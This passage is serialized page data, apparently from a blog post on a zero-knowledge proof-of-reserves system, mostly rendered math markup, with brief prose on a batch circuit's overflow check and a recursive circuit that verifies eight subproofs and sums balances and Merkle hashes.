hash)",{"type":28,"tag":459,"props":94453,"children":94454},{},[94455,94730,94731,94736,94738,94743],{"type":28,"tag":98,"props":94456,"children":94458},{"className":94457},[3652,3653],[94459],{"type":28,"tag":116,"props":94460,"children":94462},{"className":94461},[3658],[94463],{"type":28,"tag":116,"props":94464,"children":94466},{"className":94465,"ariaHidden":3664},[3663],[94467,94660],{"type":28,"tag":116,"props":94468,"children":94470},{"className":94469},[3669],[94471,94475,94480,94485,94490,94495,94500,94505,94510,94515,94520,94525,94530,94535,94540,94545,94602,94607,94612,94617,94622,94627,94632,94637,94642,94647,94651,94656],{"type":28,"tag":116,"props":94472,"children":94474},{"className":94473,"style":92605},[3674],[],{"type":28,"tag":116,"props":94476,"children":94478},{"className":94477},[3680,21251],[94479],{"type":33,"value":87},{"type":28,"tag":116,"props":94481,"children":94483},{"className":94482},[3680,21251],[94484],{"type":33,"value":93120},{"type":28,"tag":116,"props":94486,"children":94488},{"className":94487},[3680,21251],[94489],{"type":33,"value":92922},{"type":28,"tag":116,"props":94491,"children":94493},{"className":94492},[3680,21251],[94494],{"type":33,"value":56022},{"type":28,"tag":116,"props":94496,"children":94498},{"className":94497},[3680,21251],[94499],{"type":33,"value":1554},{"type":28,"tag":116,"props":94501,"children":94503},{"className":94502,"style":92663},[3680],[94504],{"type":33,"value":2754},{"type":28,"tag":116,"props":94506,"children":94508},{"className":94507},[3680,21251],[94509],{"type":33,"value":87},{"type":28,"tag":116,"props":94511,"children":94513},{"className":94512},[3680,21251],[94514],{"type":33,"value":92654},{"type":28,"tag":116,"props":94516,"children":94518},{"className":94517},[3680,21251],[94519],{"type":33,"value":1554},{"type":28,"tag":116,"props":94521,"children":94523},{"className":94522,"style":92663},[3680],[94524],{"type":33,"value":2754},{"type":28,"tag":116,"props":94526,"children":94528},{"className":94527},[3680,21251],[94529],{"type":33,"value":92671},{"type":28,"tag":116,"props":94531,"children":94533},{"className":94532,"style":92675},[3680,21251],[94534],{"type":33,"value":92678},{"type":28,"tag":116,"props":94536,"children":94538},{"className":94537},[3680,21251],[94539],{"type":33,"value":92684},{"type":28,"tag":116,"props":94541,"children":94543},{"className":94542},[3680,21251],[94544],{"type":33,"value":92690},{"type":28,"tag":116,"props":94546,"children":94548},{"className":94547},[3680],[94549,94554],{"type":28,"tag":116,"props":94550,"children":94552},{"className":94551},[3680,21251],[94553],{"type":33,"value":10318},{"type":28,"tag":116,"props":94555,"children":94557},{"className":94556},[3695],[94558],{"type":28,"tag":116,"props":94559,"children":94561},{"className":94560},[3700,21305],[94562,94591],{"type":28,"tag":116,"props":94563,"children":94565},{"className":94564},[3705],[94566,94586],{"type":28,"tag":116,"props":94567,"children":94569},{"className":94568,"style":93192},[3710],[94570],{"type":28,"tag":116,"props":94571,"children":94572},{"style":92719},[94573,94577],{"type":28,"tag":116,"props":94574,"children":94576},{"className":94575,"style":3720},[3719],[],{"type":28,"tag":116,"props":94578,"children":94580},{"className":94579},[3725,3726,3727,3728],[94581],{"type":28,"tag":116,"props":94582,"children":94584},{"className":94583},[3680,21251,3728],[94585],{"type":33,"value":3408},{"type":28,"tag":116,"props":94587,"children":94589},{"className":94588},[21407],[94590],{"type":33,"value":21410},{"type":28,"tag":116,"props":94592,"children":94594},{"className":94593},[3705],[94595],{"type":28,"tag":116,"props":94596,"children":94598},{"className":94597,"style":92746},[3710],[94599],{"type":28,"tag":116,"props":94600,"children":94601},{},[],{"type":28,"tag":116,"props":94603,"children":94605},{"className":94604},[21380],[94606],{"type":33,"value":347},{"type":28,"tag":116,"props":94608,"children":94610},{"className":94609},[3680,21251],[94611],{"type":33,"value":87},{"type":28,"tag":116,"props":94613,"children":94615},{"className":94614},[3680,21251],[94616],{"type":33,"value":92654},{"type":28,"tag":116,"props":94618,"children":94620},{"className":94619},[3680,21251],[94621],{"type":33,"value":1554},{"type":28,"tag":116,"props":94623,"children":94625},{"className":94624,"style":92663},[3680],[94626],{"type":33,"value":2754},{"type":28,"tag":116,"props":94628,"children":94630},{"className":94629},[3680,21251],[94631],{"type":33,"value":56022},{"type":28,"tag":116,"props":94633,"children":94635},{"className":94634},[3680,21251],[94636],{"type":33,"value":92922},{"type":28,"tag":116,"props":94638,"children":94640},{"className":94639},[3680,21251],[94641],{"type":33,"value":50752},{"type":28,"tag":116,"props":94643,"children":94645},{"className":94644},[21401],[94646],{"type":33,"value":15074},{"type":28,"tag":116,"props":94648,"children":94650},{"className":94649,"style":3857},[3759],[],{"type":28,"tag":116,"props":94652,"children":94654},{"className":94653},[3862],[94655],{"type":33,"value":514},{"type":28,"tag":116,"props":94657,"children":94659},{"className":94658,"style":3857},[3759],[],{"type":28,"tag":116,"props":94661,"children":94663},{"className":94662},[3669],[94664,94668,94675,94680,94686,94691,94696,94701,94707,94712,94718,94724],{"type":28,"tag":116,"props":94665,"children":94667},{"className":94666,"style":92605},[3674],[],{"type":28,"tag":116,"props":94669,"children":94672},{"className":94670,"style":94671},[3680,21251],"margin-right:0.10903em;",[94673],{"type":33,"value":94674},"M",{"type":28,"tag":116,"props":94676,"children":94678},{"className":94677},[3680,21251],[94679],{"type":33,"value":76387},{"type":28,"tag":116,"props":94681,"children":94684},{"className":94682,"style":94683},[3680,21251],"margin-right:0.07847em;",[94685],{"type":33,"value":5804},{"type":28,"tag":116,"props":94687,"children":94689},{"className":94688,"style":92663},[3680],[94690],{"type":33,"value":2754},{"type":28,"tag":116,"props":94692,"children":94694},{"className":94693,"style":21709},[3680,21251],[94695],{"type":33,"value":21712},{"type":28,"tag":116,"props":94697,"children":94699},{"className":94698},[3680,21251],[94700],{"type":33,"value":76387},{"type":28,"tag":116,"props":94702,"children":94704},{"className":94703,"style":21709},[3680,21251],[94705],{"type":33,"value":94706},"FE",{"type":28,"tag":116,"props":94708,"children":94710},{"className":94709,"style":92663},[3680],[94711],{"type":33,"value":2754},{"type":28,"tag":116,"props":94713,"children":94715},{"className":94714,"style":94683},[3680,21251],[94716],{"type":33,"value":94717},"I",{"type":28,"tag":116,"props":94719,"children":94721},{"className":94720,"style":21252},[3680,21251],[94722],{"type":33,"value":94723},"NT",{"type":28,"tag":116,"props":94725,"children":94727},{"className":94726},[3680],[94728],{"type":33,"value":94729},"/512",{"type":33,"value":6129},{"type":28,"tag":4995,"props":94732,"children":94733},{},[94734],{"type":33,"value":94735},"(overflow check)",{"type":33,"value":94737}," --> overflow check is made this way for performance (note that 512 is actually the ",{"type":28,"tag":98,"props":94739,"children":94741},{"className":94740},[],[94742],{"type":33,"value":92521},{"type":33,"value":1829},{"type":28,"tag":29,"props":94745,"children":94746},{},[94747],{"type":33,"value":94748},"Here is a visual scheme of the inputs of the batch circuit + how user hashes are generated:",{"type":28,"tag":29,"props":94750,"children":94751},{},[94752],{"type":28,"tag":206,"props":94753,"children":94755},{"alt":50198,"src":94754},"/posts/por/batch-circuit-inputs.png",[],{"type":28,"tag":75,"props":94757,"children":94759},{"id":94758},"recursive-circuit",[94760],{"type":33,"value":94761},"Recursive Circuit",{"type":28,"tag":29,"props":94763,"children":94764},{},[94765],{"type":33,"value":94766},"Recursive circuits get eight subproofs as input, verify if all the asset prices are the same, and calculate the summed balances and Merkle hash. Here are the constraints.",{"type":28,"tag":29,"props":94768,"children":94769},{},[94770],{"type":28,"tag":4995,"props":94771,"children":94772},{},[94773],{"type":33,"value":93035},{"type":28,"tag":2108,"props":94775,"children":94776},{},[94777,94781,94786],{"type":28,"tag":459,"props":94778,"children":94779},{},[94780],{"type":33,"value":93053},{"type":28,"tag":459,"props":94782,"children":94783},{},[94784],{"type":33,"value":94785},"Asset prices",{"type":28,"tag":459,"props":94787,"children":94788},{},[94789],{"type":33,"value":93048},{"type":28,"tag":29,"props":94791,"children":94792},{},[94793],{"type":28,"tag":4995,"props":94794,"children":94795},{},[94796],{"type":33,"value":93061},{"type":28,"tag":2108,"props":94798,"children":94799},{},[94800],{"type":28,"tag":459,"props":94801,"children":94802},{},[94803],{"type":33,"value":94804},"8 subproofs",{"type":28,"tag":29,"props":94806,"children":94807},{},[94808],{"type":28,"tag":4995,"props":94809,"children":94810},{},[94811],{"type":33,"value":93082},{"type":28,"tag":2108,"props":94813,"children":94814},{},[94815,95225,95556,95923,96310],{"type":28,"tag":459,"props":94816,"children":94817},{},[94818,95220,95221],{"type":28,"tag":98,"props":94819,"children":94821},{"className":94820},[3652,3653],[94822],{"type":28,"tag":116,"props":94823,"children":94825},{"className":94824},[3658],[94826],{"type":28,"tag":116,"props":94827,"children":94829},{"className":94828,"ariaHidden":3664},[3663],[94830,94966],{"type":28,"tag":116,"props":94831,"children":94833},{"className":94832},[3669],[94834,94838,94843,94848,94853,94858,94863,94868,94873,94878,94883,94888,94893,94898,94903,94908,94913,94918,94923,94928,94933,94938,94943,94948,94953,94957,94962],{"type":28,"tag":116,"props":94835,"children":94837},{"className":94836,"style":92605},[3674],[],{"type":28,"tag":116,"props":94839,"children":94841},{"className":94840},[3680,21251],[94842],{"type":33,"value":1554},{"type":28,"tag":116,"props":94844,"children":94846},{"className":94845},[3680,21251],[94847],{"type":33,"value":92633},{"type":28,"tag":116,"props":94849,"children":94851},{"className":94850},[3680,21251],[94852],{"type":33,"value":1554},{"type":28,"tag":116,"props":94854,"children":94856},{"className":94855},[3680,21251],[94857],{"type":33,"value":87},{"type":28,"tag":116,"props":94859,"children":94861},{"className":94860,"style":92675},[3680,21251],[94862],{"type":33,"value":92678},{"type":28,"tag":116,"props":94864,"children":94866},{"className":94865,"style":92663},[3680],[94867],{"type":33,"value":2754},{"type":28,"tag":116,"props":94869,"children":94871},{"className":94870},[3680,21251],[94872],{"type":33,"value":87},{"type":28,"tag":116,"props":94874,"children":94876},{"className":94875},[3680,21251],[94877],{"type":33,"value":92654},{"type":28,"tag":116,"props":94879,"children":94881},{"className":94880},[3680,21251],[94882],{"type":33,"value":1554},{"type":28,"tag":116,"props":94884,"children":94886},{"className":94885,"style":92663},[3680],[94887],{"type":33,"value":2754},{"type":28,"tag":116,"props":94889,"children":94891},{"className":94890},[3680,21251],[94892],{"type":33,"value":92671},{"type":28,"tag":116,"props":94894,"children":94896},{"className":94895,"style":92675},[3680,21251],[94897],{"type":33,"value":92678},{"type":28,"tag":116,"props":94899,"children":94901},{"className":94900},[3680,21251],[94902],{"type":33,"value":92684},{"type":28,"tag":116,"props":94904,"children":94906},{"className":94905},[3680,21251],[94907],{"type":33,"value":92690},{"type":28,"tag":116,"props":94909,"children":94911},{"className":94910},[21380],[94912],{"type":33,"value":347},{"type":28,"tag":116,"props":94914,"children":94916},{"className":94915},[3680,21251],[94917],{"type":33,"value":87},{"type":28,"tag":116,"props":94919,"children":94921},{"className":94920},[3680,21251],[94922],{"type":33,"value":92654},{"type":28,"tag":116,"props":94924,"children":94926},{"className":94925},[3680,21251],[94927],{"type":33,"value":1554},{"type":28,"tag":116,"props":94929,"children":94931},{"className":94930,"style":92663},[3680],[94932],{"type":33,"value":2754},{"type":28,"tag":116,"props":94934,"children":94936},{"className":94935},[3680,21251],[94937],{"type":33,"value":56022},{"type":28,"tag":116,"props":94939,"children":94941},{"className":94940},[3680,21251],[94942],{"type":33,"value":92922},{"type":28,"tag":116,"props":94944,"children":94946},{"className":94945},[3680,21251],[94947],{"type":33,"value":50752},{"type":28,"tag":116,"props":94949,"children":94951},{"className":94950},[21401],[94952],{"type":33,"value":15074},{"type":28,"tag":116,"props":94954,"children":94956},{"className":94955,"style":3857},[3759],[],{"type":28,"tag":116,"props":94958,"children":94960},{"className":94959},[3862],[94961],{"type":33,"value":2340},{"type":28,"tag":116,"props":94963,"children":94965},{"className":94964,"style":3857},[3759],[],{"type":28,"tag":116,"props":94967,"children":94969},{"className":94968},[3669],[94970,94974,94979,94984,94989,94994,94999,95004,95010,95069,95074,95079,95084,95089,95094,95099,95104,95109,95115,95120,95125,95130,95135,95140,95145,95150,95155,95160,95165,95170,95175,95180,95185,95190,95195,95200,95205,95210,95215],{"type":28,"tag":116,"props":94971,"children":94973},{"className":94972,"style":92605},[3674],[],{"type":28,"tag":116,"props":94975,"children":94977},{"className":94976},[3680],[94978],{"type":33,"value":93253},{"type":28,"tag":116,"props":94980,"children":94982},{"className":94981},[3759],[94983],{"type":33,"value":21352},{"type":28,"tag":116,"props":94985,"children":94987},{"className":94986},[3680,21251],[94988],{"type":33,"value":10318},{"type":28,"tag":116,"props":94990,"children":94992},{"className":94991},[3680,21251],[94993],{"type":33,"value":92922},{"type":28,"tag":116,"props":94995,"children":94997},{"className":94996},[3680,21251],[94998],{"type":33,"value":2893},{"type":28,"tag":116,"props":95000,"children":95002},{"className":95001},[3680,21251],[95003],{"type":33,"value":29},{"type":28,"tag":116,"props":95005,"children":95007},{"className":95006},[3680,21251],[95008],{"type":33,"value":95009},"roo",{"type":28,"tag":116,"props":95011,"children":95013},{"className":95012},[3680],[95014,95020],{"type":28,"tag":116,"props":95015,"children":95018},{"className":95016,"style":95017},[3680,21251],"margin-right:0.10764em;",[95019],{"type":33,"value":32719},{"type":28,"tag":116,"props":95021,"children":95023},{"className":95022},[3695],[95024],{"type":28,"tag":116,"props":95025,"children":95027},{"className":95026},[3700,21305],[95028,95058],{"type":28,"tag":116,"props":95029,"children":95031},{"className":95030},[3705],[95032,95053],{"type":28,"tag":116,"props":95033,"children":95035},{"className":95034,"style":93192},[3710],[95036],{"type":28,"tag":116,"props":95037,"children":95039},{"style":95038},"top:-2.55em;margin-left:-0.1076em;margin-right:0.05em;",[95040,95044],{"type":28,"tag":116,"props":95041,"children":95043},{"className":95042,"style":3720},[3719],[],{"type":28,"tag":116,"props":95045,"children":95047},{"className":95046},[3725,3726,3727,3728],[95048],{"type":28,"tag":116,"props":95049,"children":95051},{"className":95050},[3680,21251,3728],[95052],{"type":33,"value":3408},{"type":28,"tag":116,"props":95054,"children":95056},{"className":95055},[21407],[95057],{"type":33,"value":21410},{"type":28,"tag":116,"props":95059,"children":95061},{"className":95060},[3705],[95062],{"type":28,"tag":116,"props":95063,"children":95065},{"className":95064,"style":92746},[3710],[95066],{"type":28,"tag":116,"props":95067,"children":95068},{},[],{"type":28,"tag":116,"props":95070,"children":95072},{"className":95071},[3680],[95073],{"type":33,"value":141},{"type":28,"tag":116,"props":95075,"children":95077},{"className":95076},[3680,21251],[95078],{"type":33,"value":29},{"type":28,"tag":116,"props":95080,"children":95082},{"className":95081},[3680,21251],[95083],{"type":33,"value":92922},{"type":28,"tag":116,"props":95085,"children":95087},{"className":95086},[3680,21251],[95088],{"type":33,"value":2893},{"type":28,"tag":116,"props":95090,"children":95092},{"className":95091,"style":92675},[3680,21251],[95093],{"type":33,"value":92678},{"type":28,"tag":116,"props":95095,"children":95097},{"className":95096},[3680,21251],[95098],{"type":33,"value":3408},{"type":28,"tag":116,"props":95100,"children":95102},{"className":95101},[3680,21251],[95103],{"type":33,"value":1797},{"type":28,"tag":116,"props":95105,"children":95107},{"className":95106,"style":92663},[3680],[95108],{"type":33,"value":2754},{"type":28,"tag":116,"props":95110,"children":95112},{"className":95111},[3680,21251],[95113],{"type":33,"value":95114},"in",{"type":28,"tag":116,"props":95116,"children":95118},{"className":95117},[3680,21251],[95119],{"type":33,"value":29},{"type":28,"tag":116,"props":95121,"children":95123},{"className":95122},[3680,21251],[95124],{"type":33,"value":92922},{"type":28,"tag":116,"props":95126,"children":95128},{"className":95127},[3680,21251],[95129],{"type":33,"value":1554},{"type":28,"tag":116,"props":95131,"children":95133},{"className":95132},[3680],[95134],{"type":33,"value":141},{"type":28,"tag":116,"props":95136,"children":95138},{"className":95137},[3680,21251],[95139],{"type":33,"value":87},{"type":28,"tag":116,"props":95141,"children":95143},{"className":95142},[3680,21251],[95144],{"type":33,"value":92654},{"type":28,"tag":116,"props":95146,"children":95148},{"className":95147},[3680,21251],[95149],{"type":33,"value":1554},{"type":28,"tag":116,"props":95151,"children":95153},{"className":95152,"style":92663},[3680],[95154],{"type":33,"value":2754},{"type":28,"tag":116,"props":95156,"children":95158},{"className":95157},[3680,21251],[95159],{"type":33,"value":92671},{"type":28,"tag":116,"props":95161,"children":95163},{"className":95162,"style":92675},[3680,21251],[95164],{"type":33,"value":92678},{"type":28,"tag":116,"props":95166,"children":95168},{"className":95167},[3680,21251],[95169],{"type":33,"value":92684},{"type":28,"tag":116,"props":95171,"children":95173},{"className":95172},[3680,21251],[95174],{"type":33,"value":93493},{"type":28,"tag":116,"props":95176,"children":95178},{"className":95177},[21380],[95179],{"type":33,"value":347},{"type":28,"tag":116,"props":95181,"children":95183},{"className":95182},[3680,21251],[95184],{"type":33,"value":87},{"type":28,"tag":116,"props":95186,"children":95188},{"className":95187},[3680,21251],[95189],{"type":33,"value":92654},{"type":28,"tag":116,"props":95191,"children":95193},{"className":95192},[3680,21251],[95194],{"type":33,"value":1554},{"type":28,"tag":116,"props":95196,"children":95198},{"className":95197,"style":92663},[3680],[95199],{"type":33,"value":2754},{"type":28,"tag":116,"props":95201,"children":95203},{"className":95202},[3680,21251],[95204],{"type":33,"value":56022},{"type":28,"tag":116,"props":95206,"children":95208},{"className":95207},[3680,21251],[95209],{"type":33,"value":92922},{"type":28,"tag":116,"props":95211,"children":95213},{"className":95212},[3680,21251],[95214],{"type":33,"value":50752},{"type":28,"tag":116,"props":95216,"children":95218},{"className":95217},[21401],[95219],{"type":33,"value":15074},{"type":33,"value":6129},{"type":28,"tag":4995,"props":95222,"children":95223},{},[95224],{"type":33,"value":94053},{"type":28,"tag":459,"props":95226,"children":95227},{},[95228],{"type":28,"tag":98,"props":95229,"children":95231},{"className":95230},[3652,3653],[95232],{"type":28,"tag":116,"props":95233,"children":95235},{"className":95234},[3658],[95236],{"type":28,"tag":116,"props":95237,"children":95239},{"className":95238,"ariaHidden":3664},[3663],[95240,95346],{"type":28,"tag":116,"props":95241,"children":95243},{"className":95242},[3669],[95244,95248,95253,95258,95263,95268,95273,95278,95283,95288,95293,95298,95303,95308,95313,95318,95323,95328,95333,95337,95342],{"type":28,"tag":116,"props":95245,"children":95247},{"className":95246,"style":92605},[3674],[],{"type":28,"tag":116,"props":95249,"children":95251},{"className":95250},[3680,21251],[95252],{"type":33,"value":87},{"type":28,"tag":116,"props":95254,"children":95256},{"className":95255},[3680,21251],[95257],{"type":33,"value":92654},{"type":28,"tag":116,"props":95259,"children":95261},{"className":95260},[3680,21251],[95262],{"type":33,"value":1554},{"type":28,"tag":116,"props":95264,"children":95266},{"className":95265,"style":92663},[3680],[95267],{"type":33,"value":2754},{"type":28,"tag":116,"props":95269,"children":95271},{"className":95270},[3680,21251],[95272],{"type":33,"value":29},{"type":28,"tag":116,"props":95274,"children":95276},{"className":95275,"style":92663},[3680,21251],[95277],{"type":33,"value":93482},{"type":28,"tag":116,"props":95279,"children":95281},{"className":95280},[3680,21251],[95282],{"type":33,"value":3408},{"type":28,"tag":116,"props":95284,"children":95286},{"className":95285},[3680,21251],[95287],{"type":33,"value":92690},{"type":28,"tag":116,"props":95289,"children":95291},{"className":95290},[21380],[95292],{"type":33,"value":347},{"type":28,"tag":116,"props":95294,"children":95296},{"className":95295},[3680,21251],[95297],{"type":33,"value":87},{"type":28,"tag":116,"props":95299,"children":95301},{"className":95300},[3680,21251],[95302],{"type":33,"value":92654},{"type":28,"tag":116,"props":95304,"children":95306},{"className":95305},[3680,21251],[95307],{"type":33,"value":1554},{"type":28,"tag":116,"props":95309,"children":95311},{"className":95310,"style":92663},[3680],[95312],{"type":33,"value":2754},{"type":28,"tag":116,"props":95314,"children":95316},{"className":95315},[3680,21251],[95317],{"type":33,"value":56022},{"type":28,"tag":116,"props":95319,"children":95321},{"className":95320},[3680,21251],[95322],{"type":33,"value":92922},{"type":28,"tag":116,"props":95324,"children":95326},{"className":95325},[3680,21251],[95327],{"type":33,"value":50752},{"type":28,"tag":116,"props":95329,"children":95331},{"className":95330},[21401],[95332],{"type":33,"value":15074},{"type":28,"tag":116,"props":95334,"children":95336},{"className":95335,"style":3857},[3759],[],{"type":28,"tag":116,"props":95338,"children":95340},{"className":95339},[3862],[95341],{"type":33,"value":2340},{"type":28,"tag":116,"props":95343,"children":95345},{"className":95344,"style":3857},[3759],[],{"type":28,"tag":116,"props":95347,"children":95349},{"className":95348},[3669],[95350,95354,95359,95364,95369,95374,95379,95436,95441,95446,95451,95456,95461,95466,95471,95476,95481,95486,95491,95496,95501,95506,95511,95516,95521,95526,95531,95536,95541,95546,95551],{"type":28,"tag":116,"props":95351,"children":95353},{"className":95352,"style":92605},[3674],[],{"type":28,"tag":116,"props":95355,"children":95357},{"className":95356},[3680,21251],[95358],{"type":33,"value":10318},{"type":28,"tag":116,"props":95360,"children":95362},{"className":95361},[3680,21251],[95363],{"type":33,"value":92922},{"type":28,"tag":116,"props":95365,"children":95367},{"className":95366},[3680,21251],[95368],{"type":33,"value":2893},{"type":28,"tag":116,"props":95370,"children":95372},{"className":95371},[3680,21251],[95373],{"type":33,"value":29},{"type":28,"tag":116,"props":95375,"children":95377},{"className":95376},[3680,21251],[95378],{"type":33,"value":95009},{"type":28,"tag":116,"props":95380,"children":95382},{"className":95381},[3680],[95383,95388],{"type":28,"tag":116,"props":95384,"children":95386},{"className":95385,"style":95017},[3680,21251],[95387],{"type":33,"value":32719},{"type":28,"tag":116,"props":95389,"children":95391},{"className":95390},[3695],[95392],{"type":28,"tag":116,"props":95393,"children":95395},{"className":95394},[3700,21305],[95396,95425],{"type":28,"tag":116,"props":95397,"children":95399},{"className":95398},[3705],[95400,95420],{"type":28,"tag":116,"props":95401,"children":95403},{"className":95402,"style":93192},[3710],[95404],{"type":28,"tag":116,"props":95405,"children":95406},{"style":95038},[95407,95411],{"type":28,"tag":116,"props":95408,"children":95410},{"className":95409,"style":3720},[3719],[],{"type":28,"tag":116,"props":95412,"children":95414},{"className":95413},[3725,3726,3727,3728],[95415],{"type":28,"tag":116,"props":95416,"children":95418},{"className":95417},[3680,21251,3728],[95419],{"type":33,"value":3408},{"type":28,"tag":116,"props":95421,"children":95423},{"className":95422},[21407],[95424],{"type":33,"value":21410},{"type":28,"tag":116,"props":95426,"children":95428},{"className":95427},[3705],[95429],{"type":28,"tag":116,"props":95430,"children":95432},{"className":95431,"style":92746},[3710],[95433],{"type":28,"tag":116,"props":95434,"children":95435},{},[],{"type":28,"tag":116,"props":95437,"children":95439},{"className":95438},[3680],[95440],{"type":33,"value":141},{"type":28,"tag":116,"props":95442,"children":95444},{"className":95443},[3680,21251],[95445],{"type":33,"value":29},{"type":28,"tag":116,"props":95447,"children":95449},{"className":95448},[3680,21251],[95450],{"type":33,"value":92922},{"type":28,"tag":116,"props":95452,"children":95454},{"className":95453},[3680,21251],[95455],{"type":33,"value":2893},{"type":28,"tag":116,"props":95457,"children":95459},{"className":95458,"style":92675},[3680,21251],[95460],{"type":33,"value":92678},{"type":28,"tag":116,"props":95462,"children":95464},{"className":95463},[3680,21251],[95465],{"type":33,"value":3408},{"type":28,"tag":116,"props":95467,"children":95469},{"className":95468},[3680,21251],[95470],{"type":33,"value":1797},{"type":28,"tag":116,"props":95472,"children":95474},{"className":95473,"style":92663},[3680],[95475],{"type":33,"value":2754},{"type":28,"tag":116,"props":95477,"children":95479},{"className":95478},[3680,21251],[95480],{"type":33,"value":95114},{"type":28,"tag":116,"props":95482,"children":95484},{"className":95483},[3680,21251],[95485],{"type":33,"value":29},{"type":28,"tag":116,"props":95487,"children":95489},{"className":95488},[3680,21251],[95490],{"type":33,"value":92922},{"type":28,"tag":116,"props":95492,"children":95494},{"className":95493},[3680,21251],[95495],{"type":33,"value":1554},{"type":28,"tag":116,"props":95497,"children":95499},{"className":95498},[3680],[95500],{"type":33,"value":141},{"type":28,"tag":116,"props":95502,"children":95504},{"className":95503},[3680,21251],[95505],{"type":33,"value":87},{"type":28,"tag":116,"props":95507,"children":95509},{"className":95508},[3680,21251],[95510],{"type":33,"value":92654},{"type":28,"tag":116,"props":95512,"children":95514},{"className":95513},[3680,21251],[95515],{"type":33,"value":1554},{"type":28,"tag":116,"props":95517,"children":95519},{"className":95518,"style":92663},[3680],[95520],{"type":33,"value":2754},{"type":28,"tag":116,"props":95522,"children":95524},{"className":95523},[3680,21251],[95525],{"type":33,"value":29},{"type":28,"tag":116,"props":95527,"children":95529},{"className":95528,"style":92663},[3680,21251],[95530],{"type":33,"value":93482},{"type":28,"tag":116,"props":95532,"children":95534},{"className":95533},[3680,21251],[95535],{"type":33,"value":3408},{"type":28,"tag":116,"props":95537,"children":95539},{"className":95538},[3680,21251],[95540],{"type":33,"value":93493},{"type":28,"tag":116,"props":95542,"children":95544},{"className":95543},[21380],[95545],{"type":33,"value":347},{"type":28,"tag":116,"props":95547,"children":95549},{"className":95548},[3680],[95550],{"type":33,"value":353},{"type":28,"tag":116,"props":95552,"children":95554},{"className":95553},[21401],[95555],{"type":33,"value":15074},{"type":28,"tag":459,"props":95557,"children":95558},{},[95559,95917,95918],{"type":28,"tag":98,"props":95560,"children":95562},{"className":95561},[3652,3653],[95563],{"type":28,"tag":116,"props":95564,"children":95566},{"className":95565},[3658],[95567],{"type":28,"tag":116,"props":95568,"children":95570},{"className":95569,"ariaHidden":3664},[3663],[95571,95677],{"type":28,"tag":116,"props":95572,"children":95574},{"className":95573},[3669],[95575,95579,95584,95589,95594,95599,95604,95609,95614,95619,95624,95629,95634,95639,95644,95649,95654,95659,95664,95668,95673],{"type":28,"tag":116,"props":95576,"children":95578},{"className":95577,"style":92605},[3674],[],{"type":28,"tag":116,"props":95580,"children":95582},{"className":95581},[3680,21251],[95583],{"type":33,"value":87},{"type":28,"tag":116,"props":95585,"children":95587},{"className":95586},[3680,21251],[95588],{"type":33,"value":92654},{"type":28,"tag":116,"props":95590,"children":95592},{"className":95591},[3680,21251],[95593],{"type":33,"value":1554},{"type":28,"tag":116,"props":95595,"children":95597},{"className":95596,"style":92663},[3680],[95598],{"type":33,"value":2754},{"type":28,"tag":116,"props":95600,"children":95602},{"className":95601},[3680,21251],[95603],{"type":33,"value":29},{"type":28,"tag":116,"props":95605,"children":95607},{"className":95606,"style":92663},[3680,21251],[95608],{"type":33,"value":93482},{"type":28,"tag":116,"props":95610,"children":95612},{"className":95611},[3680,21251],[95613],{"type":33,"value":3408},{"type":28,"tag":116,"props":95615,"children":95617},{"className":95616},[3680,21251],[95618],{"type":33,"value":92690},{"type":28,"tag":116,"props":95620,"children":95622},{"className":95621},[21380],[95623],{"type":33,"value":347},{"type":28,"tag":116,"props":95625,"children":95627},{"className":95626},[3680,21251],[95628],{"type":33,"value":87},{"type":28,"tag":116,"props":95630,"children":95632},{"className":95631},[3680,21251],[95633],{"type":33,"value":92654},{"type":28,"tag":116,"props":95635,"children":95637},{"className":95636},[3680,21251],[95638],{"type":33,"value":1554},{"type":28,"tag":116,"props":95640,"children":95642},{"className":95641,"style":92663},[3680],[95643],{"type":33,"value":2754},{"type":28,"tag":116,"props":95645,"children":95647},{"className":95646},[3680,21251],[95648],{"type":33,"value":56022},{"type":28,"tag":116,"props":95650,"children":95652},{"className":95651},[3680,21251],[95653],{"type":33,"value":92922},{"type":28,"tag":116,"props":95655,"children":95657},{"className":95656},[3680,21251],[95658],{"type":33,"value":50752},{"type":28,"tag":116,"props":95660,"children":95662},{"className":95661},[21401],[95663],{"type":33,"value":15074},{"type":28,"tag":116,"props":95665,"children":95667},{"className":95666,"style":3857},[3759],[],{"type":28,"tag":116,"props":95669,"children":95671},{"className":95670},[3862],[95672],{"type":33,"value":2340},{"type":28,"tag":116,"props":95674,"children":95676},{"className":95675,"style":3857},[3759],[],{"type":28,"tag":116,"props":95678,"children":95680},{"className":95679},[3669],[95681,95685,95690,95695,95700,95705,95710,95767,95772,95777,95782,95787,95792,95797,95802,95807,95812,95817,95822,95827,95832,95837,95842,95847,95852,95857,95862,95867,95872,95877,95882,95887,95892,95897,95902,95907,95912],{"type":28,"tag":116,"props":95682,"children":95684},{"className":95683,"style":92605},[3674],[],{"type":28,"tag":116,"props":95686,"children":95688},{"className":95687},[3680,21251],[95689],{"type":33,"value":10318},{"type":28,"tag":116,"props":95691,"children":95693},{"className":95692},[3680,21251],[95694],{"type":33,"value":92922},{"type":28,"tag":116,"props":95696,"children":95698},{"className":95697},[3680,21251],[95699],{"type":33,"value":2893},{"type":28,"tag":116,"props":95701,"children":95703},{"className":95702},[3680,21251],[95704],{"type":33,"value":29},{"type":28,"tag":116,"props":95706,"children":95708},{"className":95707},[3680,21251],[95709],{"type":33,"value":95009},{"type":28,"tag":116,"props":95711,"children":95713},{"className":95712},[3680],[95714,95719],{"type":28,"tag":116,"props":95715,"children":95717},{"className":95716,"style":95017},[3680,21251],[95718],{"type":33,"value":32719},{"type":28,"tag":116,"props":95720,"children":95722},{"className":95721},[3695],[95723],{"type":28,"tag":116,"props":95724,"children":95726},{"className":95725},[3700,21305],[95727,95756],{"type":28,"tag":116,"props":95728,"children":95730},{"className":95729},[3705],[95731,95751],{"type":28,"tag":116,"props":95732,"children":95734},{"className":95733,"style":93192},[3710],[95735],{"type":28,"tag":116,"props":95736,"children":95737},{"style":95038},[95738,95742],{"type":28,"tag":116,"props":95739,"children":95741},{"className":95740,"style":3720},[3719],[],{"type":28,"tag":116,"props":95743,"children":95745},{"className":95744},[3725,3726,3727,3728],[95746],{"type":28,"tag":116,"props":95747,"children":95749},{"className":95748},[3680,21251,3728],[95750],{"type":33,"value":3408},{"type":28,"tag":116,"props":95752,"children":95754},{"className":95753},[21407],[95755],{"type":33,"value":21410},{"type":28,"tag":116,"props":95757,"children":95759},{"className":95758},[3705],[95760],{"type":28,"tag":116,"props":95761,"children":95763},{"className":95762,"style":92746},[3710],[95764],{"type":28,"tag":116,"props":95765,"children":95766},{},[],{"type":28,"tag":116,"props":95768,"children":95770},{"className":95769},[3680],[95771],{"type":33,"value":141},{"type